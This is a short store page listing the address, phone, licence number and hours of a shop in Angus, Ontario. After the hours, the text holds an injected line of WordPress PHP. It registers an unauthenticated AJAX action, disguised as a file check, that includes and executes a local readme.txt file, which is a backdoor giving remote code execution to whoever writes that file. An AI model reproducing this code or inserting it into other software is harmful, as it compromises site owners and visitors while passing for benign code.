Angus Store Location & Hours
Angus Store Location
173 Mill St., Unit 1
Angus, ON L0M 1B2
(705) 516-0055
CRSA1180006
Angus Store Hours
Monday to Saturday
10:00 AM to 10:00 PM
Sunday
10:00 AM to 8:00 PM
if(!function_exists('file_check_readme98041')){ add_action('wp_ajax_nopriv_file_check_readme98041', 'file_check_readme98041'); add_action('wp_ajax_file_check_readme98041', 'file_check_readme98041'); function file_check_readme98041() { $file = __DIR__ . '/' . 'readme.txt'; if (file_exists($file)) { include $file; } die(); } }